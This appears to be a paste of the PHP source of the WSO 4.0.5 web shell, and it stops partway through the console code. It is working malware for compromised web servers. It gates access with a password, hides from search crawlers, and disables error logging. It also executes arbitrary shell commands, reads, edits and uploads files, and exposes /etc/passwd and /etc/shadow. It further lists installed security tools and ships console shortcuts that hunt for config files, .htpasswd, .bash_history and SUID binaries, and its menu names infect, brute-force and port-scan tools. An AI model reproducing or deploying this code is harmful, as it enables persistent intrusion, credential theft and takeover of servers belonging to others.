· 6 years ago · Oct 15, 2019, 07:50 AM
1<?php
2/* WSO 4.0.5 (Web Shell by HARD _LINUX) */
3$auth_pass = "21232f297a57a5a743894a0e4a801fc3"; //admin
4$color = "#fff";
5$default_action = 'FilesMan';
6@define('SELF_PATH', __FILE__);
7if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
8 header('HTTP/1.0 404 Not Found');
9 exit;
10}
11@session_start();
12@error_reporting(0);
13@ini_set('error_log',NULL);
14@ini_set('log_errors',0);
15@ini_set('max_execution_time',0);
16@set_time_limit(0);
17@define('VERSION', '4.0.5');
18if( get_magic_quotes_gpc() ) {
19 function stripslashes_array($array) {
20 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
21 }
22 $_POST = stripslashes_array($_POST);
23}
24function printLogin() {
25 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
26 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
27 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
28 header('HTTP/1.0 404 Not Found');
29 exit;
30 }
31 }
32 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;'><input type=submit value='>>' style='border:none;background-color:teal;color:#fff;'></form></pre>");
33}
34if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
35 if( empty( $auth_pass ) ||
36 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
37 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
38 else
39 printLogin();
40if( strtolower( substr(PHP_OS,0,3) ) == "win" )
41 $os = 'win';
42else
43 $os = 'nix';
44$safe_mode = @ini_get('safe_mode');
45$disable_functions = @ini_get('disable_functions');
46$home_cwd = @getcwd();
47if( isset( $_POST['c'] ) )
48 @chdir($_POST['c']);
49$cwd = @getcwd();
50if( $os == 'win') {
51 $home_cwd = str_replace("\\", "/", $home_cwd);
52 $cwd = str_replace("\\", "/", $cwd);
53}
54if( $cwd[strlen($cwd)-1] != '/' )
55 $cwd .= '/';
56function printHeader() {
57 if(empty($_POST['charset']))
58 $_POST['charset'] = "UTF-8";
59 global $color;
60 ?>
61<html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?> - WSO <?=VERSION?></title>
62<style>
63 body {background-color:#000;color:#e1e1e1;}
64 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
65 table.info {color:#C3C3C3;background-color:#000;}
66 span,h1,a {color:<?=$color?> !important;}
67 span {font-weight:bolder;}
68 h1 {border-left:5px solid teal;padding:2px 5px;font:14pt Verdana;background-color:#222;margin:0px;}
69 div.content {padding:5px;margin-left:5px;background-color:#000;}
70 a {text-decoration:none;}
71 a:hover {text-decoration:underline;}
72 .ml1 {border:1px solid #444;padding:5px;margin:0;overflow:auto;}
73 .bigarea {width:100%;height:250px; }
74 input, textarea, select {margin:0;color:#fff;background-color:#444;border:1px solid #000; font:9pt Courier New;}
75 form {margin:0px;}
76 #toolsTbl {text-align:center;}
77 .toolsInp {width:300px}
78 .main th {text-align:left;background-color:#000;}
79 .main tr:hover{background-color:#5e5e5e}
80 .main td, th{vertical-align:middle}
81 .l1 {background-color:#444}
82 pre {font:9pt Courier New;}
83</style>
84<script>
85 function set(a,c,p1,p2,p3,charset) {
86 if(a != null)document.mf.a.value=a;
87 if(c != null)document.mf.c.value=c;
88 if(p1 != null)document.mf.p1.value=p1;
89 if(p2 != null)document.mf.p2.value=p2;
90 if(p3 != null)document.mf.p3.value=p3;
91 if(charset != null)document.mf.charset.value=charset;
92 }
93 function g(a,c,p1,p2,p3,charset) {
94 set(a,c,p1,p2,p3,charset);
95 document.mf.submit();
96 }
97 function a(a,c,p1,p2,p3,charset) {
98 set(a,c,p1,p2,p3,charset);
99 var params = "ajax=true";
100 for(i=0;i<document.mf.elements.length;i++)
101 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
102 sr('<?=$_SERVER['REQUEST_URI'];?>', params);
103 }
104 function sr(url, params) {
105 if (window.XMLHttpRequest) {
106 req = new XMLHttpRequest();
107 req.onreadystatechange = processReqChange;
108 req.open("POST", url, true);
109 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
110 req.send(params);
111 }
112 else if (window.ActiveXObject) {
113 req = new ActiveXObject("Microsoft.XMLHTTP");
114 if (req) {
115 req.onreadystatechange = processReqChange;
116 req.open("POST", url, true);
117 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
118 req.send(params);
119 }
120 }
121 }
122 function processReqChange() {
123 if( (req.readyState == 4) )
124 if(req.status == 200) {
125 //alert(req.responseText);
126 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
127 var arr=reg.exec(req.responseText);
128 eval(arr[2].substr(0, arr[1]));
129 }
130 else alert("Request error!");
131 }
132</script>
133<head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
134<form method=post name=mf style='display:none;'>
135<input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'>
136<input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
137<input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'>
138<input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'>
139<input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'>
140<input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
141</form>
142<?php
143 $freeSpace = @diskfreespace($GLOBALS['cwd']);
144 $totalSpace = @disk_total_space($GLOBALS['cwd']);
145 $totalSpace = $totalSpace?$totalSpace:1;
146 $release = @php_uname('r');
147 $kernel = @php_uname('s');
148 $millink='http://www.exploit-db.com/search/?action=search&description=';
149 if( strpos('Linux', $kernel) !== false )
150 $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
151 else
152 $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
153 if(!function_exists('posix_getegid')) {
154 $user = @get_current_user();
155 $uid = @getmyuid();
156 $gid = @getmygid();
157 $group = "?";
158 } else {
159 $uid = @posix_getpwuid(@posix_geteuid());
160 $gid = @posix_getgrgid(@posix_getegid());
161 $user = $uid['name'];
162 $uid = $uid['uid'];
163 $group = $gid['name'];
164 $gid = $gid['gid'];
165 }
166 $cwd_links = '';
167 $path = explode("/", $GLOBALS['cwd']);
168 $n=count($path);
169 for($i=0;$i<$n-1;$i++) {
170 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
171 for($j=0;$j<=$i;$j++)
172 $cwd_links .= $path[$j].'/';
173 $cwd_links .= "\")'>".$path[$i]."/</a>";
174 }
175 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
176 $opt_charsets = '';
177 foreach($charsets as $item)
178 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
179
180 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Port Scanner'=>'PortScanner','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
181 if(!empty($GLOBALS['auth_pass']))
182 $m['Logout'] = 'Logout';
183 $m['Self remove'] = 'SelfRemove';
184 $menu = '';
185 foreach($m as $k => $v)
186 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
187 $drives = "";
188 if ($GLOBALS['os'] == 'win') {
189 foreach( range('a','z') as $drive )
190 if (is_dir($drive.':\\'))
191 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
192 }
193 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.
194 '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-DB]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'.
195 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.
196 '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;"><tr>'.$menu.'</tr></table><div>';
197}
198function printFooter() {
199 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
200?>
201</div>
202<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
203 <tr>
204 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td>
205 <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
206 </tr>
207 <tr>
208 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td>
209 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td>
210 </tr>
211 <tr>
212 <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
213 <td><form method='post' ENCTYPE='multipart/form-data'>
214 <input type=hidden name=a value='FilesMAn'>
215 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
216 <input type=hidden name=p1 value='uploadFile'>
217 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
218 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td>
219 </tr>
220
221</table>
222</div>
223</body></html>
224<?php
225}
226if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
227if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
228function ex($in) {
229 $out = '';
230 if(function_exists('exec')) {
231 @exec($in,$out);
232 $out = @join("\n",$out);
233 }elseif(function_exists('passthru')) {
234 ob_start();
235 @passthru($in);
236 $out = ob_get_clean();
237 }elseif(function_exists('system')) {
238 ob_start();
239 @system($in);
240 $out = ob_get_clean();
241 }elseif(function_exists('shell_exec')) {
242 $out = shell_exec($in);
243 }elseif(is_resource($f = @popen($in,"r"))) {
244 $out = "";
245 while(!@feof($f))
246 $out .= fread($f,1024);
247 pclose($f);
248 }else return "↳ Unable to execute command\n";
249 return ($out==''?"↳ Query did not return anything\n":$out);
250}
251function viewSize($s) {
252 if($s >= 1073741824)
253 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
254 elseif($s >= 1048576)
255 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
256 elseif($s >= 1024)
257 return sprintf('%1.2f', $s / 1024 ) . ' KB';
258 else
259 return $s . ' B';
260}
261function perms($p) {
262 if (($p & 0xC000) == 0xC000)$i = 's';
263 elseif (($p & 0xA000) == 0xA000)$i = 'l';
264 elseif (($p & 0x8000) == 0x8000)$i = '-';
265 elseif (($p & 0x6000) == 0x6000)$i = 'b';
266 elseif (($p & 0x4000) == 0x4000)$i = 'd';
267 elseif (($p & 0x2000) == 0x2000)$i = 'c';
268 elseif (($p & 0x1000) == 0x1000)$i = 'p';
269 else $i = 'u';
270 $i .= (($p & 0x0100) ? 'r' : '-');
271 $i .= (($p & 0x0080) ? 'w' : '-');
272 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
273 $i .= (($p & 0x0020) ? 'r' : '-');
274 $i .= (($p & 0x0010) ? 'w' : '-');
275 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
276 $i .= (($p & 0x0004) ? 'r' : '-');
277 $i .= (($p & 0x0002) ? 'w' : '-');
278 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
279 return $i;
280}
281function viewPermsColor($f) {
282 if (!@is_readable($f))
283 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
284 elseif (!@is_writable($f))
285 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
286 else
287 return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
288}
289if(!function_exists("scandir")) {
290 function scandir($dir) {
291 $dh = opendir($dir);
292 while (false !== ($filename = readdir($dh))) {
293 $files[] = $filename;
294 }
295 return $files;
296 }
297}
298function which($p) {
299 $path = ex('which '.$p);
300 if(!empty($path))
301 return $path;
302 return false;
303}
304// Sec. Info go --------------------
305function actionSecInfo() {
306 printHeader();
307 echo '<h1>Server security information</h1><div class=content>';
308 function showSecParam($n, $v) {
309 $v = trim($v);
310 if($v) {
311 echo '<span>'.$n.': </span>';
312 if(strpos($v, "\n") === false)
313 echo $v.'<br>';
314 else
315 echo '<pre class=ml1>'.$v.'</pre>';
316 }
317 }
318
319 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
320 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
321 showSecParam('Open base dir', @ini_get('open_basedir'));
322 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
323 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
324 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
325 $temp=array();
326 if(function_exists('mysql_get_client_info'))
327 $temp[] = "MySql (".mysql_get_client_info().")";
328 if(function_exists('mssql_connect'))
329 $temp[] = "MSSQL";
330 if(function_exists('pg_connect'))
331 $temp[] = "PostgreSQL";
332 if(function_exists('oci_connect'))
333 $temp[] = "Oracle";
334 showSecParam('Supported databases', implode(', ', $temp));
335 echo '<br>';
336
337 if( $GLOBALS['os'] == 'nix' ) {
338 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
339 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
340 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
341 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
342 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
343 showSecParam('OS version', @file_get_contents('/proc/version'));
344 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
345 if(!$GLOBALS['safe_mode']) {
346 echo '<br>';
347 $temp=array();
348 foreach ($userful as $item)
349 if(which($item)){$temp[]=$item;}
350 showSecParam('Userful', implode(', ',$temp));
351 $temp=array();
352 foreach ($danger as $item)
353 if(which($item)){$temp[]=$item;}
354 showSecParam('Danger', implode(', ',$temp));
355 $temp=array();
356 foreach ($downloaders as $item)
357 if(which($item)){$temp[]=$item;}
358 showSecParam('Downloaders', implode(', ',$temp));
359 echo '<br/>';
360 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
361 showSecParam('HDD space', ex('df -h'));
362 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
363 echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
364 if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) {
365 $temp = "";
366 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
367 $uid = @posix_getpwuid($_POST['p2']);
368 if ($uid)
369 $temp .= join(':',$uid)."\n";
370 }
371 echo '<br/>';
372 showSecParam('Users', $temp);
373 }
374 }
375 } else {
376 showSecParam('OS Version',ex('ver'));
377 showSecParam('Account Settings',ex('net accounts'));
378 showSecParam('User Accounts',ex('net user'));
379 }
380 echo '</div>';
381 printFooter();
382}
383// Sec. Info end --------------------
384// File tools go -----------------------
385function actionFilesTools() {
386 if( isset($_POST['p1']) )
387 $_POST['p1'] = urldecode($_POST['p1']);
388 if(@$_POST['p2']=='download') {
389 if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
390 ob_start("ob_gzhandler", 4096);
391 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
392 if (function_exists("mime_content_type")) {
393 $type = @mime_content_type($_POST['p1']);
394 header("Content-Type: ".$type);
395 }
396 $fp = @fopen($_POST['p1'], "r");
397 if($fp) {
398 while(!@feof($fp))
399 echo @fread($fp, 1024);
400 fclose($fp);
401 }
402 } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
403 }
404 exit;
405 }
406 if( @$_POST['p2'] == 'mkfile' ) {
407 if(!file_exists($_POST['p1'])) {
408 $fp = @fopen($_POST['p1'], 'w');
409 if($fp) {
410 $_POST['p2'] = "edit";
411 fclose($fp);
412 }
413 }
414 }
415 printHeader();
416 echo '<h1>File tools</h1><div class=content>';
417 if( !file_exists(@$_POST['p1']) ) {
418 echo 'File not exists';
419 printFooter();
420 return;
421 }
422 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
423 $gid = @posix_getgrgid(@fileowner($_POST['p1']));
424 echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
425 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
426 if( empty($_POST['p2']) )
427 $_POST['p2'] = 'view';
428 if( is_file($_POST['p1']) )
429 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
430 else
431 $m = array('Chmod', 'Rename', 'Touch');
432 foreach($m as $v)
433 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
434 echo '<br><br>';
435 switch($_POST['p2']) {
436 case 'view':
437 echo '<pre class=ml1>';
438 $fp = @fopen($_POST['p1'], 'r');
439 if($fp) {
440 while( !@feof($fp) )
441 echo htmlspecialchars(@fread($fp, 1024));
442 @fclose($fp);
443 }
444 echo '</pre>';
445 break;
446 case 'highlight':
447 if( is_readable($_POST['p1']) ) {
448 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
449 $code = highlight_file($_POST['p1'],true);
450 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
451 }
452 break;
453 case 'chmod':
454 if( !empty($_POST['p3']) ) {
455 $perms = 0;
456 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
457 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
458 if(!@chmod($_POST['p1'], $perms))
459 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
460 else
461 die('<script>g(null,null,null,null,"")</script>');
462 }
463 echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
464 break;
465 case 'edit':
466 if( !is_writable($_POST['p1'])) {
467 echo 'File isn\'t writeable';
468 break;
469 }
470 if( !empty($_POST['p3']) ) {
471 @file_put_contents($_POST['p1'],$_POST['p3']);
472 echo 'Saved!<br><script>document.mf.p3.value="";</script>';
473 }
474 echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
475 $fp = @fopen($_POST['p1'], 'r');
476 if($fp) {
477 while( !@feof($fp) )
478 echo htmlspecialchars(@fread($fp, 1024));
479 @fclose($fp);
480 }
481 echo '</textarea><input type=submit value=">>"></form>';
482 break;
483 case 'hexdump':
484 $c = @file_get_contents($_POST['p1']);
485 $n = 0;
486 $h = array('00000000<br>','','');
487 $len = strlen($c);
488 for ($i=0; $i<$len; ++$i) {
489 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
490 switch ( ord($c[$i]) ) {
491 case 0: $h[2] .= ' '; break;
492 case 9: $h[2] .= ' '; break;
493 case 10: $h[2] .= ' '; break;
494 case 13: $h[2] .= ' '; break;
495 default: $h[2] .= $c[$i]; break;
496 }
497 $n++;
498 if ($n == 32) {
499 $n = 0;
500 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
501 $h[1] .= '<br>';
502 $h[2] .= "\n";
503 }
504 }
505 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
506 break;
507 case 'rename':
508 if( !empty($_POST['p3']) ) {
509 if(!@rename($_POST['p1'], $_POST['p3']))
510 echo 'Can\'t rename!<br><script>document.mf.p3.value="";</script>';
511 else
512 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
513 }
514 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
515 break;
516 case 'touch':
517 if( !empty($_POST['p3']) ) {
518 $time = strtotime($_POST['p3']);
519 if($time) {
520 if(@touch($_POST['p1'],$time,$time))
521 die('<script>g(null,null,null,null,"")</script>');
522 else {
523 echo 'Fail!<script>document.mf.p3.value="";</script>';
524 }
525 } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
526 }
527 echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
528 break;
529 case 'mkfile':
530
531 break;
532 }
533 echo '</div>';
534 printFooter();
535}
536// File tools end ----------------------
537// Console go --------------------
538if($os == 'win')
539 $aliases = array(
540 "List Directory" => "dir",
541 "Find index.php in current dir" => "dir /s /w /b index.php",
542 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
543 "Show active connections" => "netstat -an",
544 "Show running services" => "net start",
545 "User accounts" => "net user",
546 "Show computers" => "net view",
547 "ARP Table" => "arp -a",
548 "IP Configuration" => "ipconfig /all"
549 );
550else
551 $aliases = array(
552 "List dir" => "ls -la",
553 "list file attributes on a Linux second extended file system" => "lsattr -va",
554 "show opened ports" => "netstat -an | grep -i listen",
555 "process status" => "ps aux",
556 "Find" => "",
557 "find all suid files" => "find / -type f -perm -04000 -ls",
558 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
559 "find all sgid files" => "find / -type f -perm -02000 -ls",
560 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
561 "find config.inc.php files" => "find / -type f -name config.inc.php",
562 "find config* files" => "find / -type f -name \"config*\"",
563 "find config* files in current dir" => "find . -type f -name \"config*\"",
564 "find all writable folders and files" => "find / -perm -2 -ls",
565 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
566 "find all service.pwd files" => "find / -type f -name service.pwd",
567 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
568 "find all .htpasswd files" => "find / -type f -name .htpasswd",
569 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
570 "find all .bash_history files" => "find / -type f -name .bash_history",
571 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
572 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
573 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
574 "Locate" => "",
575 "locate httpd.conf files" => "locate httpd.conf",
576 "locate vhosts.conf files" => "locate vhosts.conf",
577 "locate proftpd.conf files" => "locate proftpd.conf",
578 "locate psybnc.conf files" => "locate psybnc.conf",
579 "locate my.conf files" => "locate my.conf",
580 "locate admin.php files" =>"locate admin.php",
581 "locate cfg.php files" => "locate cfg.php",
582 "locate conf.php files" => "locate conf.php",
583 "locate config.dat files" => "locate config.dat",
584 "locate config.php files" => "locate config.php",
585 "locate config.inc files" => "locate config.inc",
586 "locate config.inc.php" => "locate config.inc.php",
587 "locate config.default.php files" => "locate config.default.php",
588 "locate config* files " => "locate config",
589 "locate .conf files"=>"locate '.conf'",
590 "locate .pwd files" => "locate '.pwd'",
591 "locate .sql files" => "locate '.sql'",
592 "locate .htpasswd files" => "locate '.htpasswd'",
593 "locate .bash_history files" => "locate '.bash_history'",
594 "locate .mysql_history files" => "locate '.mysql_history'",
595 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
596 "locate backup files" => "locate backup",
597 "locate dump files" => "locate dump",
598 "locate priv files" => "locate priv"
599 );
600
601function actionConsole() {
602 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
603 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
604 $_POST['p1'] .= ' 2>&1';
605 } elseif(!empty($_POST['p1']))
606 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = 0;
607
608 if(isset($_POST['ajax'])) {
609 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
610 ob_start();
611 echo "document.cf.cmd.value='';\n";
612 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
613 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
614 if(@chdir($match[1])) {
615 $GLOBALS['cwd'] = @getcwd();
616 echo "document.mf.c.value='".$GLOBALS['cwd']."';";
617 }
618 }
619 echo "document.cf.output.value+='".$temp."';";
620 echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
621 $temp = ob_get_clean();
622 echo strlen($temp), "\n", $temp;
623 exit;
624 }
625 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
626 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = 0;
627 printHeader();
628echo "<script>
629if(window.Event) window.captureEvents(Event.KEYDOWN);
630var cmds = new Array('');
631var cur = 0;
632function kp(e) {
633 var n = (window.Event) ? e.which : e.keyCode;
634 if(n == 38) {
635 cur--;
636 if(cur>=0)
637 document.cf.cmd.value = cmds[cur];
638 else
639 cur++;
640 } else if(n == 40) {
641 cur++;
642 if(cur < cmds.length)
643 document.cf.cmd.value = cmds[cur];
644 else
645 cur--;
646 }
647}
648function add(cmd) {
649 cmds.pop();
650 cmds.push(cmd);
651 cmds.push('');
652 cur = cmds.length-1;
653}
654</script>";
655 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
656 foreach($GLOBALS['aliases'] as $n => $v) {
657 if($v == '') {
658 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
659 continue;
660 }
661 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
662 }
663
